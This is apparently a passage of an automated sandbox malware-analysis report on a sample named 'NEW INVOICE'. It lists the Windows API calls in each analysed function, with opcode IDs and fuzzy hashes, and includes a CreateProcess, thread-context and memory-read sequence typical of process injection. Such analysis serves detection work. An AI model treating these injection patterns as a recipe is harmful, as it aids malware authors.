                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03F72F69
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03F72F8B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062931234.0000000003F71000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F71000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_3f71000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 2438371351-0
                                                                                    • Opcode ID: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                                    • Instruction ID: 52fd046c473f49166e13ded8a5d16d14893918de24a7bb6c4979f4aceda1b72a
                                                                                    • Opcode Fuzzy Hash: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                                    • Instruction Fuzzy Hash: B562F934A142589BEB24CFA4CC50BDEB376EF58300F1095AAD10DEB3A4E7759E81CB59
                                                                                    APIs
                                                                                    • _malloc.LIBCMT ref: 00411734
                                                                                      • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                      • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                      • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                    • std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                      • Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC
                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                    • __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 1411284514-0
                                                                                    • Opcode ID: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                                    • Instruction ID: c554e94cc15d94fff19a40754e7570613bf3612ee9c26c673f8185df9075a277
                                                                                    • Opcode Fuzzy Hash: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                                    • Instruction Fuzzy Hash: 6FF0E23550060A66CF08B723EC06ADE3B649F11798B10403BFA20552F2DF6DADC9865C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                    • Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
                                                                                    • Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                    • Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
                                                                                    • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3677997916-0
                                                                                    • Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                    • Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
                                                                                    • Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                    • Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
                                                                                    APIs
                                                                                    • _malloc.LIBCMT ref: 00435278
                                                                                      • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                      • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                      • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                    • _malloc.LIBCMT ref: 00435288
                                                                                    • _malloc.LIBCMT ref: 00435298
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: _malloc$AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 680241177-0
                                                                                    • Opcode ID: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                                    • Instruction ID: 30b75876ff52ae1c35022de4a6700901ba1db26c97f4d16f7fcf584af9a5a73f
                                                                                    • Opcode Fuzzy Hash: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                                    • Instruction Fuzzy Hash: E5F0A0B1500F0046E660AB3198457C7A2E09B14307F00186FB6855618ADA7C69C4CEAC
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClearVariant
                                                                                    • String ID:
                                                                                    • API String ID: 1473721057-0
                                                                                    • Opcode ID: 8496133a3e3a1872fc5ab7f8f11462cad1d7adca9b2736ff52cb45440ba86ce9
                                                                                    • Instruction ID: 1f11e118333250ff1b1cce483c812f274274124743f71e781b8a547d9d3e43da
                                                                                    • Opcode Fuzzy Hash: 8496133a3e3a1872fc5ab7f8f11462cad1d7adca9b2736ff52cb45440ba86ce9
                                                                                    • Instruction Fuzzy Hash: 35917E706042009FC714DF55D890A6AB7E5EF89318F14896FF849AB392D738EE41CB9E
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 0040F00A
                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 004299D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                    • Instruction ID: 855a981e3d87b0586b227f36a287a9e63fe5cd358b5bfab8de368ff291d46a89
                                                                                    • Opcode Fuzzy Hash: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                    • Instruction Fuzzy Hash: 67011D703803107AF2311F28AD5BF5632546B44B24F244B39FBD5BE2E2D2F86885970C
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: __lock_file_memset
                                                                                    • String ID:
                                                                                    • API String ID: 26237723-0
                                                                                    • Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                                    • Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
                                                                                    • Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                                    • Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99
                                                                                    APIs
                                                                                      • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                      • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                    • __lock_file.LIBCMT ref: 00414EE4
                                                                                      • Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A
                                                                                    • __fclose_nolock.LIBCMT ref: 00414EEE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                                                    • String ID:
                                                                                    • API String ID: 717694121-0
                                                                                    • Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                                    • Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
                                                                                    • Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                                    • Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D
                                                                                    APIs
                                                                                    • TranslateMessage.USER32(?), ref: 004098F6
                                                                                    • DispatchMessageW.USER32(?), ref: 00409901
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DispatchTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 1706434739-0
                                                                                    • Opcode ID: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                                                                                    • Instruction ID: 6b3a2aeb923af73eb4cdb1bab797699f2cf27729a5018e8568c19fb4e3feaf67
                                                                                    • Opcode Fuzzy Hash: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                                                                                    • Instruction Fuzzy Hash: D4F05471114301AEDA24DBE58D41B5BB3A8AFD8700F408C2EBA51E61C1FBF8E404C76A
                                                                                    APIs
                                                                                    • TranslateMessage.USER32(?), ref: 004098F6
                                                                                    • DispatchMessageW.USER32(?), ref: 00409901
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DispatchTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 1706434739-0
                                                                                    • Opcode ID: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                                                                                    • Instruction ID: cc4909b6a78c34842ee59a7900970f574117f06624f4f9c7373c79b1fb9dfc76
                                                                                    • Opcode Fuzzy Hash: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                                                                                    • Instruction Fuzzy Hash: DDF054B1114301AADA14DBE58D41B5BB3A4AF94740F408C2EBA11E52C1EBFCD504C71A
                                                                                    APIs
                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 03F72ED3
                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03F72F69
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03F72F8B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062931234.0000000003F71000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F71000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_3f71000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 2438371351-0
                                                                                    • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                    • Instruction ID: 56b20a0aa4fce3f4514e247ca4000bed7e6b3e527f28dbab49a559b5ed6e857e
                                                                                    • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                    • Instruction Fuzzy Hash: 4612CD24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                    • Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                    • Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
                                                                                    • Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
                                                                                    • Opcode Fuzzy Hash: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
                                                                                    • Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E
                                                                                    APIs
                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProcWindow
                                                                                    • String ID:
                                                                                    • API String ID: 181713994-0
                                                                                    • Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                    • Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
                                                                                    • Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                    • Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
                                                                                    APIs
                                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 10892065-0
                                                                                    • Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                    • Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
                                                                                    • Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                    • Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
                                                                                    APIs
                                                                                      • Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,0044434E,?,?,00429A83,?,00487174,00000003,0040DFEE,?), ref: 004442F3
                                                                                    • WriteFile.KERNELBASE(?,?,00000001,?,00000000,?,?,00429A83,?,00487174,00000003,0040DFEE,?,?,00000001,00403843), ref: 00444362
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$PointerWrite
                                                                                    • String ID:
                                                                                    • API String ID: 539440098-0
                                                                                    • Opcode ID: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                                    • Instruction ID: 4a339a6eb5dfef6003722c1615037f540bc53d76d7f4c43935d02bdd90bbdfc9
                                                                                    • Opcode Fuzzy Hash: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                                    • Instruction Fuzzy Hash: 7CE09275104311AFD250DF54D944F9BB3F8AF88714F108D0EF59587241D7B4A9848BA6
                                                                                    APIs
                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProcWindow
                                                                                    • String ID:
                                                                                    • API String ID: 181713994-0
                                                                                    • Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                    • Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
                                                                                    • Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                    • Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
                                                                                    APIs
